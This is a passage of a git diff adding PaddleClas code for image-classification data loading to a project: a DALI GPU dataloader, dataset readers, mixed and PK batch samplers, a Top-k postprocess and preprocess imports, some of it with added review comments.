        self.to_int64 = ops.Cast(dtype=types.DALIDataType.INT64, device="gpu")

    def define_graph(self):
        jpegs, labels = self.input(name="Reader")
        images = self.decode(jpegs)
        images = self.res(images)
        output = self.cmnp(images)
        return [output, self.to_int64(labels.gpu())]

    def __len__(self):
        return self.epoch_size("Reader")


def dali_dataloader(config, mode, device, seed=None):
    """Build a DALI iterator for the given mode from a DataLoader config.

    Args:
        config (dict): the ``DataLoader`` config section, keyed by mode.
        mode (str): e.g. 'Train' or 'Eval'; selects pipeline and allowed ops.
        device (str): paddle device string, must contain "gpu" (e.g. "gpu:0").
        seed (int|None): pipeline seed; defaults to 42.

    Returns:
        nvidia.dali.plugin.paddle.DALIGenericIterator yielding
        ``{'data': ..., 'label': ...}`` batches.
    """
    assert "gpu" in device, "gpu training is required for DALI"
    device_id = int(device.split(':')[1])
    config_dataloader = config[mode]
    seed = 42 if seed is None else seed
    # names of the configured transform ops (NOTE: this local shadows the
    # nvidia.dali.ops module import within this function)
    ops = [
        list(x.keys())[0]
        for x in config_dataloader["dataset"]["transform_ops"]
    ]
    support_ops_train = [
        "DecodeImage", "NormalizeImage", "RandFlipImage", "RandCropImage"
    ]
    support_ops_eval = [
        "DecodeImage", "ResizeImage", "CropImage", "NormalizeImage"
    ]

    # DALI supports only a fixed set of transforms per mode; the config
    # must use exactly that set
    if mode.lower() == 'train':
        assert set(ops) == set(
            support_ops_train
        ), "The supported trasform_ops for train_dataset in dali is : {}".format(
            ",".join(support_ops_train))
    else:
        assert set(ops) == set(
            support_ops_eval
        ), "The supported trasform_ops for eval_dataset in dali is : {}".format(
            ",".join(support_ops_eval))

    normalize_ops = [
        op for op in config_dataloader["dataset"]["transform_ops"]
        if "NormalizeImage" in op
    ][0]["NormalizeImage"]
    channel_num = normalize_ops.get("channel_num", 3)
    output_dtype = types.FLOAT16 if normalize_ops.get("output_fp16",
                                                      False) else types.FLOAT

    env = os.environ
    # assert float(env.get('FLAGS_fraction_of_gpu_memory_to_use', 0.92)) < 0.9, \
    #     "Please leave enough GPU memory for DALI workspace, e.g., by setting" \
    #     " `export FLAGS_fraction_of_gpu_memory_to_use=0.8`"

    # NOTE(review): gpu_num is computed but not used below
    gpu_num = paddle.distributed.get_world_size()

    batch_size = config_dataloader["sampler"]["batch_size"]

    file_root = config_dataloader["dataset"]["image_root"]
    file_list = config_dataloader["dataset"]["cls_label_path"]

    interp = 1  # settings.interpolation or 1 # default to linear
    interp_map = {
        0: types.DALIInterpType.INTERP_NN,  # cv2.INTER_NEAREST
        1: types.DALIInterpType.INTERP_LINEAR,  # cv2.INTER_LINEAR
        2: types.DALIInterpType.INTERP_CUBIC,  # cv2.INTER_CUBIC
        3: types.DALIInterpType.
        INTERP_LANCZOS3,  # XXX use LANCZOS3 for cv2.INTER_LANCZOS4
    }

    assert interp in interp_map, "interpolation method not supported by DALI"
    interp = interp_map[interp]
    pad_output = channel_num == 4

    # flatten the list of single-key op dicts into one {op_name: kwargs} map
    transforms = {
        k: v
        for d in config_dataloader["dataset"]["transform_ops"]
        for k, v in d.items()
    }

    scale = transforms["NormalizeImage"].get("scale", 1.0 / 255)
    scale = eval(scale) if isinstance(scale, str) else scale
    mean = transforms["NormalizeImage"].get("mean", [0.485, 0.456, 0.406])
    std = transforms["NormalizeImage"].get("std", [0.229, 0.224, 0.225])
    # DALI normalizes un-scaled pixel values, so fold the scale factor
    # into mean/std instead
    mean = [v / scale for v in mean]
    std = [v / scale for v in std]

    sampler_name = config_dataloader["sampler"].get("name",
                                                    "DistributedBatchSampler")
    assert sampler_name in ["DistributedBatchSampler", "BatchSampler"]

    if mode.lower() == "train":
        resize_shorter = 256
        crop = transforms["RandCropImage"]["size"]
        scale = transforms["RandCropImage"].get("scale", [0.08, 1.])
        ratio = transforms["RandCropImage"].get("ratio", [3.0 / 4, 4.0 / 3])
        min_area = scale[0]
        lower = ratio[0]
        upper = ratio[1]

        # multi-trainer run: shard the reader per trainer using the paddle
        # distributed environment variables
        if 'PADDLE_TRAINER_ID' in env and 'PADDLE_TRAINERS_NUM' in env:
            shard_id = int(env['PADDLE_TRAINER_ID'])
            num_shards = int(env['PADDLE_TRAINERS_NUM'])
            device_id = int(env['FLAGS_selected_gpus'])
            pipe = HybridTrainPipe(
                file_root,
                file_list,
                batch_size,
                resize_shorter,
                crop,
                min_area,
                lower,
                upper,
                interp,
                mean,
                std,
                device_id,
                shard_id,
                num_shards,
                seed=seed + shard_id,
                pad_output=pad_output,
                output_dtype=output_dtype)
            pipe.build()
            pipelines = [pipe]
            # sample_per_shard = len(pipe) // num_shards
        else:
            # single-process run: one unsharded pipeline
            pipe = HybridTrainPipe(
                file_root,
                file_list,
                batch_size,
                resize_shorter,
                crop,
                min_area,
                lower,
                upper,
                interp,
                mean,
                std,
                device_id=device_id,
                shard_id=0,
                num_shards=1,
                seed=seed,
                pad_output=pad_output,
                output_dtype=output_dtype)
            pipe.build()
            pipelines = [pipe]
            # sample_per_shard = len(pipelines[0])
        return DALIGenericIterator(
            pipelines, ['data', 'label'], reader_name='Reader')
    else:
        resize_shorter = transforms["ResizeImage"].get("resize_short", 256)
        crop = transforms["CropImage"]["size"]
        # eval is only sharded when using DistributedBatchSampler
        if 'PADDLE_TRAINER_ID' in env and 'PADDLE_TRAINERS_NUM' in env and sampler_name == "DistributedBatchSampler":
            shard_id = int(env['PADDLE_TRAINER_ID'])
            num_shards = int(env['PADDLE_TRAINERS_NUM'])
            device_id = int(env['FLAGS_selected_gpus'])

            pipe = HybridValPipe(
                file_root,
                file_list,
                batch_size,
                resize_shorter,
                crop,
                interp,
                mean,
                std,
                device_id=device_id,
                shard_id=shard_id,
                num_shards=num_shards,
                pad_output=pad_output,
                output_dtype=output_dtype)
        else:
            pipe = HybridValPipe(
                file_root,
                file_list,
                batch_size,
                resize_shorter,
                crop,
                interp,
                mean,
                std,
                device_id=device_id,
                pad_output=pad_output,
                output_dtype=output_dtype)
        pipe.build()
        return DALIGenericIterator(
            [pipe], ['data', 'label'], reader_name="Reader")
+ +from __future__ import print_function + +import numpy as np +import os + +from .common_dataset import CommonDataset + + +class ICartoonDataset(CommonDataset): + def _load_anno(self, seed=None): + assert os.path.exists(self._cls_path) + assert os.path.exists(self._img_root) + self.images = [] + self.labels = [] + + with open(self._cls_path) as fd: + lines = fd.readlines() + for l in lines: + l = l.strip().split("\t") + self.images.append(os.path.join(self._img_root, l[0])) + self.labels.append(int(l[1])) + assert os.path.exists(self.images[-1]) diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/imagenet_dataset.py b/Smart_container/PaddleClas/ppcls/data/dataloader/imagenet_dataset.py new file mode 100644 index 0000000..e084bb7 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/imagenet_dataset.py @@ -0,0 +1,38 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import print_function + +import numpy as np +import os + +from .common_dataset import CommonDataset + + +class ImageNetDataset(CommonDataset): + def _load_anno(self, seed=None): + assert os.path.exists(self._cls_path) + assert os.path.exists(self._img_root) + self.images = [] + self.labels = [] + + with open(self._cls_path) as fd: + lines = fd.readlines() + if seed is not None: + np.random.RandomState(seed).shuffle(lines) + for l in lines: + l = l.strip().split(" ") + self.images.append(os.path.join(self._img_root, l[0])) + self.labels.append(int(l[1])) + assert os.path.exists(self.images[-1]) diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/logo_dataset.py b/Smart_container/PaddleClas/ppcls/data/dataloader/logo_dataset.py new file mode 100644 index 0000000..3e05e7f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/logo_dataset.py @@ -0,0 +1,47 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import print_function + +import io +import tarfile +import numpy as np +from PIL import Image #all use default backend + +import paddle +from paddle.io import Dataset +import pickle +import os +import cv2 +import random + +from .common_dataset import CommonDataset + +class LogoDataset(CommonDataset): + def _load_anno(self): + assert os.path.exists(self._cls_path) + assert os.path.exists(self._img_root) + self.images = [] + self.labels = [] + with open(self._cls_path) as fd: + lines = fd.readlines() + for l in lines: + l = l.strip().split("\t") + if l[0] == 'image_id': + continue + self.images.append(os.path.join(self._img_root, l[3])) + self.labels.append(int(l[1])-1) + assert os.path.exists(self.images[-1]) + + diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/mix_dataset.py b/Smart_container/PaddleClas/ppcls/data/dataloader/mix_dataset.py new file mode 100644 index 0000000..cbf4b40 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/mix_dataset.py @@ -0,0 +1,49 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import print_function + +import numpy as np +import os + +from paddle.io import Dataset +from .. 
import dataloader + + +class MixDataset(Dataset): + def __init__(self, datasets_config): + super().__init__() + self.dataset_list = [] + start_idx = 0 + end_idx = 0 + for config_i in datasets_config: + dataset_name = config_i.pop('name') + dataset = getattr(dataloader, dataset_name)(**config_i) + end_idx += len(dataset) + self.dataset_list.append([end_idx, start_idx, dataset]) + start_idx = end_idx + + self.length = end_idx + + def __getitem__(self, idx): + for dataset_i in self.dataset_list: + if dataset_i[0] > idx: + dataset_i_idx = idx - dataset_i[1] + return dataset_i[2][dataset_i_idx] + + def __len__(self): + return self.length + + def get_dataset_list(self): + return self.dataset_list diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/mix_sampler.py b/Smart_container/PaddleClas/ppcls/data/dataloader/mix_sampler.py new file mode 100644 index 0000000..2df3109 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/mix_sampler.py @@ -0,0 +1,79 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
from __future__ import absolute_import
from __future__ import division

from paddle.io import DistributedBatchSampler, Sampler

from ppcls.utils import logger
from ppcls.data.dataloader.mix_dataset import MixDataset
from ppcls.data import dataloader


class MixSampler(DistributedBatchSampler):
    # Batch sampler over a MixDataset: every emitted batch is assembled from
    # one sub-batch per sub-dataset, with per-dataset batch sizes derived
    # from the configured ratios. Sub-dataset indices are shifted by each
    # dataset's start offset so they address the MixDataset's global range.
    def __init__(self, dataset, batch_size, sample_configs, iter_per_epoch):
        super().__init__(dataset, batch_size)
        assert isinstance(dataset,
                          MixDataset), "MixSampler only support MixDataset"
        self.sampler_list = []
        self.batch_size = batch_size
        self.start_list = []
        self.length = iter_per_epoch
        dataset_list = dataset.get_dataset_list()
        batch_size_left = self.batch_size
        self.iter_list = []
        for i, config_i in enumerate(sample_configs):
            # dataset_list entries are [end_idx, start_idx, dataset].
            self.start_list.append(dataset_list[i][1])
            sample_method = config_i.pop("name")
            ratio_i = config_i.pop("ratio")
            if i < len(sample_configs) - 1:
                batch_size_i = int(self.batch_size * ratio_i)
                batch_size_left -= batch_size_i
            else:
                # Last dataset absorbs whatever is left so the sub-batch
                # sizes always sum exactly to batch_size.
                batch_size_i = batch_size_left
            assert batch_size_i <= len(dataset_list[i][2])
            config_i["batch_size"] = batch_size_i
            if sample_method == "DistributedBatchSampler":
                sampler_i = DistributedBatchSampler(dataset_list[i][2],
                                                    **config_i)
            else:
                # Custom sampler class looked up from ppcls.data.dataloader.
                sampler_i = getattr(dataloader, sample_method)(
                    dataset_list[i][2], **config_i)
            self.sampler_list.append(sampler_i)
            self.iter_list.append(iter(sampler_i))
            # NOTE(review): self.length starts at iter_per_epoch and is then
            # incremented by len(dataset_i) * ratio_i, so __len__ mixes an
            # iteration count with dataset-derived counts — looks suspicious;
            # confirm the intended epoch length against the training loop.
            self.length += len(dataset_list[i][2]) * ratio_i
        self.iter_counter = 0

    def __iter__(self):
        while self.iter_counter < self.length:
            batch = []
            for i, iter_i in enumerate(self.iter_list):
                batch_i = next(iter_i, None)
                if batch_i is None:
                    # This sub-sampler is exhausted: restart it so shorter
                    # datasets cycle while longer ones keep going.
                    iter_i = iter(self.sampler_list[i])
                    self.iter_list[i] = iter_i
                    batch_i = next(iter_i, None)
                    assert batch_i is not None, "dataset {} return None".format(
                        i)
                # Shift local indices into the MixDataset's global range.
                batch += [idx + self.start_list[i] for idx in batch_i]
            if len(batch) == self.batch_size:
                self.iter_counter += 1
                yield batch
            else:
                # Short batch (some sub-sampler returned fewer indices):
                # dropped, not yielded.
                logger.info("Some dataset reaches end")
        # Reset so the sampler can be iterated again next epoch.
        self.iter_counter = 0

    def __len__(self):
        return self.length


# The header below belongs to the next file in this diff
# (ppcls/data/dataloader/multilabel_dataset.py):
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
+ +from __future__ import print_function + +import numpy as np +import os +import cv2 + +from ppcls.data.preprocess import transform +from ppcls.utils import logger + +from .common_dataset import CommonDataset + + +class MultiLabelDataset(CommonDataset): + def _load_anno(self): + assert os.path.exists(self._cls_path) + assert os.path.exists(self._img_root) + self.images = [] + self.labels = [] + with open(self._cls_path) as fd: + lines = fd.readlines() + for l in lines: + l = l.strip().split("\t") + self.images.append(os.path.join(self._img_root, l[0])) + + labels = l[1].split(',') + labels = [int(i) for i in labels] + + self.labels.append(labels) + assert os.path.exists(self.images[-1]) + + def __getitem__(self, idx): + try: + with open(self.images[idx], 'rb') as f: + img = f.read() + if self._transform_ops: + img = transform(img, self._transform_ops) + img = img.transpose((2, 0, 1)) + label = np.array(self.labels[idx]).astype("float32") + return (img, label) + + except Exception as ex: + logger.error("Exception occured when parse line: {} with msg: {}". + format(self.images[idx], ex)) + rnd_idx = np.random.randint(self.__len__()) + return self.__getitem__(rnd_idx) diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/pk_sampler.py b/Smart_container/PaddleClas/ppcls/data/dataloader/pk_sampler.py new file mode 100644 index 0000000..bf563a6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/pk_sampler.py @@ -0,0 +1,105 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from collections import defaultdict +import numpy as np +import random +from paddle.io import DistributedBatchSampler + +from ppcls.utils import logger + + +class PKSampler(DistributedBatchSampler): + """ + First, randomly sample P identities. + Then for each identity randomly sample K instances. + Therefore batch size is P*K, and the sampler called PKSampler. + Args: + dataset (paddle.io.Dataset): list of (img_path, pid, cam_id). + sample_per_id(int): number of instances per identity in a batch. + batch_size (int): number of examples in a batch. + shuffle(bool): whether to shuffle indices order before generating + batch indices. Default False. + """ + + def __init__(self, + dataset, + batch_size, + sample_per_id, + shuffle=True, + drop_last=True, + sample_method="sample_avg_prob"): + super().__init__( + dataset, batch_size, shuffle=shuffle, drop_last=drop_last) + assert batch_size % sample_per_id == 0, \ + "PKSampler configs error, Sample_per_id must be a divisor of batch_size." + assert hasattr(self.dataset, + "labels"), "Dataset must have labels attribute." 
+ self.sample_per_label = sample_per_id + self.label_dict = defaultdict(list) + self.sample_method = sample_method + for idx, label in enumerate(self.dataset.labels): + self.label_dict[label].append(idx) + self.label_list = list(self.label_dict) + assert len(self.label_list) * self.sample_per_label > self.batch_size, \ + "batch size should be smaller than " + if self.sample_method == "id_avg_prob": + self.prob_list = np.array([1 / len(self.label_list)] * + len(self.label_list)) + elif self.sample_method == "sample_avg_prob": + counter = [] + for label_i in self.label_list: + counter.append(len(self.label_dict[label_i])) + self.prob_list = np.array(counter) / sum(counter) + else: + logger.error( + "PKSampler only support id_avg_prob and sample_avg_prob sample method, " + "but receive {}.".format(self.sample_method)) + diff = np.abs(sum(self.prob_list) - 1) + if diff > 0.00000001: + self.prob_list[-1] = 1 - sum(self.prob_list[:-1]) + if self.prob_list[-1] > 1 or self.prob_list[-1] < 0: + logger.error("PKSampler prob list error") + else: + logger.info( + "PKSampler: sum of prob list not equal to 1, diff is {}, change the last prob".format(diff) + ) + + def __iter__(self): + label_per_batch = self.batch_size // self.sample_per_label + for _ in range(len(self)): + batch_index = [] + batch_label_list = np.random.choice( + self.label_list, + size=label_per_batch, + replace=False, + p=self.prob_list) + for label_i in batch_label_list: + label_i_indexes = self.label_dict[label_i] + if self.sample_per_label <= len(label_i_indexes): + batch_index.extend( + np.random.choice( + label_i_indexes, + size=self.sample_per_label, + replace=False)) + else: + batch_index.extend( + np.random.choice( + label_i_indexes, + size=self.sample_per_label, + replace=True)) + if not self.drop_last or len(batch_index) == self.batch_size: + yield batch_index diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/vehicle_dataset.py 
b/Smart_container/PaddleClas/ppcls/data/dataloader/vehicle_dataset.py new file mode 100644 index 0000000..80fc6bb --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/vehicle_dataset.py @@ -0,0 +1,138 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import print_function + +import numpy as np +import paddle +from paddle.io import Dataset +import os +import cv2 + +from ppcls.data import preprocess +from ppcls.data.preprocess import transform +from ppcls.utils import logger +from .common_dataset import create_operators + + +class CompCars(Dataset): + def __init__(self, + image_root, + cls_label_path, + label_root=None, + transform_ops=None, + bbox_crop=False): + self._img_root = image_root + self._cls_path = cls_label_path + self._label_root = label_root + if transform_ops: + self._transform_ops = create_operators(transform_ops) + self._bbox_crop = bbox_crop + self._dtype = paddle.get_default_dtype() + self._load_anno() + + def _load_anno(self): + assert os.path.exists(self._cls_path) + assert os.path.exists(self._img_root) + if self._bbox_crop: + assert os.path.exists(self._label_root) + self.images = [] + self.labels = [] + self.bboxes = [] + with open(self._cls_path) as fd: + lines = fd.readlines() + for l in lines: + l = l.strip().split() + if not self._bbox_crop: + self.images.append(os.path.join(self._img_root, l[0])) + self.labels.append(int(l[1])) + else: + 
label_path = os.path.join(self._label_root, + l[0].split('.')[0] + '.txt') + assert os.path.exists(label_path) + with open(label_path) as f: + bbox = f.readlines()[-1].strip().split() + bbox = [int(x) for x in bbox] + self.images.append(os.path.join(self._img_root, l[0])) + self.labels.append(int(l[1])) + self.bboxes.append(bbox) + assert os.path.exists(self.images[-1]) + + def __getitem__(self, idx): + img = cv2.imread(self.images[idx]) + img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) + if self._bbox_crop: + bbox = self.bboxes[idx] + img = img[bbox[1]:bbox[3], bbox[0]:bbox[2], :] + if self._transform_ops: + img = transform(img, self._transform_ops) + img = img.transpose((2, 0, 1)) + return (img, self.labels[idx]) + + def __len__(self): + return len(self.images) + + @property + def class_num(self): + return len(set(self.labels)) + + +class VeriWild(Dataset): + def __init__( + self, + image_root, + cls_label_path, + transform_ops=None, ): + self._img_root = image_root + self._cls_path = cls_label_path + if transform_ops: + self._transform_ops = create_operators(transform_ops) + self._dtype = paddle.get_default_dtype() + self._load_anno() + + def _load_anno(self): + assert os.path.exists(self._cls_path) + assert os.path.exists(self._img_root) + self.images = [] + self.labels = [] + self.cameras = [] + with open(self._cls_path) as fd: + lines = fd.readlines() + for l in lines: + l = l.strip().split() + self.images.append(os.path.join(self._img_root, l[0])) + self.labels.append(int(l[1])) + self.cameras.append(int(l[2])) + assert os.path.exists(self.images[-1]) + + def __getitem__(self, idx): + try: + with open(self.images[idx], 'rb') as f: + img = f.read() + if self._transform_ops: + img = transform(img, self._transform_ops) + img = img.transpose((2, 0, 1)) + return (img, self.labels[idx], self.cameras[idx]) + except Exception as ex: + logger.error("Exception occured when parse line: {} with msg: {}". 
+ format(self.images[idx], ex)) + rnd_idx = np.random.randint(self.__len__()) + return self.__getitem__(rnd_idx) + + def __len__(self): + return len(self.images) + + @property + def class_num(self): + return len(set(self.labels)) diff --git a/Smart_container/PaddleClas/ppcls/data/postprocess/__init__.py b/Smart_container/PaddleClas/ppcls/data/postprocess/__init__.py new file mode 100644 index 0000000..831a4da --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/postprocess/__init__.py @@ -0,0 +1,41 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import copy +import importlib + +from . 
import copy
import importlib

from . import topk

from .topk import Topk, MultiLabelTopk


def build_postprocess(config):
    """Instantiate a postprocess callable from a config dict.

    ``config["name"]`` selects a class defined/imported in this module
    (e.g. "Topk", "MultiLabelTopk", "DistillationPostProcess"); all other
    keys are forwarded to its constructor. The dict is deep-copied first so
    the caller's config is not mutated by ``pop``.
    """
    config = copy.deepcopy(config)
    model_name = config.pop("name")
    mod = importlib.import_module(__name__)
    postprocess_func = getattr(mod, model_name)(**config)
    return postprocess_func


class DistillationPostProcess(object):
    """Postprocess for distillation outputs.

    Picks one sub-model's output dict entry (``model_name``), optionally one
    key inside it, then applies a regular postprocess such as Topk.
    """

    def __init__(self, model_name="Student", key=None, func="Topk", **kargs):
        super().__init__()
        # Fixed: resolve the postprocess class by attribute lookup on this
        # module instead of eval() on a config-supplied string.
        self.func = getattr(importlib.import_module(__name__), func)(**kargs)
        self.model_name = model_name
        self.key = key

    def __call__(self, x, file_names=None):
        x = x[self.model_name]
        if self.key is not None:
            x = x[self.key]
        return self.func(x, file_names=file_names)


# The header below belongs to the next file in this diff
# (ppcls/data/postprocess/topk.py):
# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os

import numpy as np


class Topk(object):
    """Convert logits into top-k class ids / scores / optional label names.

    Args:
        topk (int): number of top classes to report per sample.
        class_id_map_file (str, optional): text file mapping
            '<class_id> <label name>' per line; when unreadable or absent,
            label names are left empty.
    """

    def __init__(self, topk=1, class_id_map_file=None):
        assert isinstance(topk, (int, ))
        self.class_id_map = self.parse_class_id_map(class_id_map_file)
        self.topk = topk

    def parse_class_id_map(self, class_id_map_file):
        """Load the id->name map; return None when no usable file is given."""
        if class_id_map_file is None:
            return None
        if not os.path.exists(class_id_map_file):
            print(
                "Warning: If want to use your own label_dict, please input legal path!\nOtherwise label_names will be empty!"
            )
            return None

        try:
            class_id_map = {}
            with open(class_id_map_file, "r") as fin:
                lines = fin.readlines()
                for line in lines:
                    # Split on the first space: '<id> <name with spaces>'.
                    partition = line.split("\n")[0].partition(" ")
                    class_id_map[int(partition[0])] = str(partition[-1])
        except Exception as ex:
            print(ex)
            class_id_map = None
        return class_id_map

    def __call__(self, x, file_names=None, multilabel=False):
        """Return a list of result dicts, one per sample in the batch.

        ``multilabel=False``: softmax + top-k. ``multilabel=True``: sigmoid
        and every class with probability >= 0.5.
        """
        # Imported lazily so this module (config parsing, label-map tooling)
        # stays importable on machines without paddle installed.
        import paddle
        import paddle.nn.functional as F

        assert isinstance(x, paddle.Tensor)
        if file_names is not None:
            assert x.shape[0] == len(file_names)
        x = F.softmax(x, axis=-1) if not multilabel else F.sigmoid(x)
        x = x.numpy()
        y = []
        for idx, probs in enumerate(x):
            index = probs.argsort(axis=0)[-self.topk:][::-1].astype(
                "int32") if not multilabel else np.where(
                    probs >= 0.5)[0].astype("int32")
            clas_id_list = []
            score_list = []
            label_name_list = []
            for i in index:
                clas_id_list.append(i.item())
                score_list.append(probs[i].item())
                if self.class_id_map is not None:
                    label_name_list.append(self.class_id_map[i.item()])
            result = {
                "class_ids": clas_id_list,
                "scores": np.around(
                    score_list, decimals=5).tolist(),
            }
            if file_names is not None:
                result["file_name"] = file_names[idx]
            # NOTE: label_name_list is always a list, so "label_names" is
            # always emitted (possibly empty) — preserved for downstream
            # consumers that rely on the key being present.
            if label_name_list is not None:
                result["label_names"] = label_name_list
            y.append(result)
        return y


class MultiLabelTopk(Topk):
    """Topk variant for multi-label outputs (sigmoid, threshold 0.5)."""

    def __init__(self, topk=1, class_id_map_file=None):
        # Fixed: forward the constructor arguments. The original called
        # super().__init__() with no args, so a configured topk or label map
        # was silently ignored (topk was always 1).
        super().__init__(topk=topk, class_id_map_file=class_id_map_file)

    def __call__(self, x, file_names=None):
        return super().__call__(x, file_names, multilabel=True)


# The header below belongs to the next file in this diff
# (ppcls/data/preprocess/__init__.py):
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ppcls.data.preprocess.ops.autoaugment import ImageNetPolicy as RawImageNetPolicy
from ppcls.data.preprocess.ops.randaugment import RandAugment as RawRandAugment
from ppcls.data.preprocess.ops.timm_autoaugment import RawTimmAutoAugment
from ppcls.data.preprocess.ops.cutout import Cutout

from ppcls.data.preprocess.ops.hide_and_seek import HideAndSeek
from ppcls.data.preprocess.ops.random_erasing import RandomErasing
from ppcls.data.preprocess.ops.grid import GridMask

from ppcls.data.preprocess.ops.operators import DecodeImage
from ppcls.data.preprocess.ops.operators import ResizeImage
from ppcls.data.preprocess.ops.operators import CropImage
from ppcls.data.preprocess.ops.operators import RandCropImage
from ppcls.data.preprocess.ops.operators import RandFlipImage
from ppcls.data.preprocess.ops.operators import NormalizeImage
from ppcls.data.preprocess.ops.operators import ToCHWImage
from ppcls.data.preprocess.ops.operators import AugMix

from ppcls.data.preprocess.batch_ops.batch_operators import MixupOperator, CutmixOperator, OpSampler, FmixOperator

import numpy as np
from PIL import Image


def transform(data, ops=None):
    """Apply a list of preprocess operators to ``data`` in order.

    Fixed: the original used a mutable default argument (``ops=[]``);
    ``None`` now means "no operators" and is fully backward compatible.
    """
    for op in (ops or []):
        data = op(data)
    return data


def _to_pil(img):
    """Coerce an ndarray (or PIL image) to a PIL image for the raw policies."""
    if not isinstance(img, Image.Image):
        img = np.ascontiguousarray(img)
        img = Image.fromarray(img)
    return img


def _to_ndarray(img):
    """Coerce a PIL image back to an ndarray; pass ndarrays through."""
    if isinstance(img, Image.Image):
        img = np.asarray(img)
    return img


class AutoAugment(RawImageNetPolicy):
    """ ImageNetPolicy wrapper to auto fit different img types """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

    def __call__(self, img):
        # The raw policy works on PIL images; round-trip ndarray inputs.
        return _to_ndarray(super().__call__(_to_pil(img)))


class RandAugment(RawRandAugment):
    """ RandAugment wrapper to auto fit different img types """

    def __init__(self, *args, **kwargs):
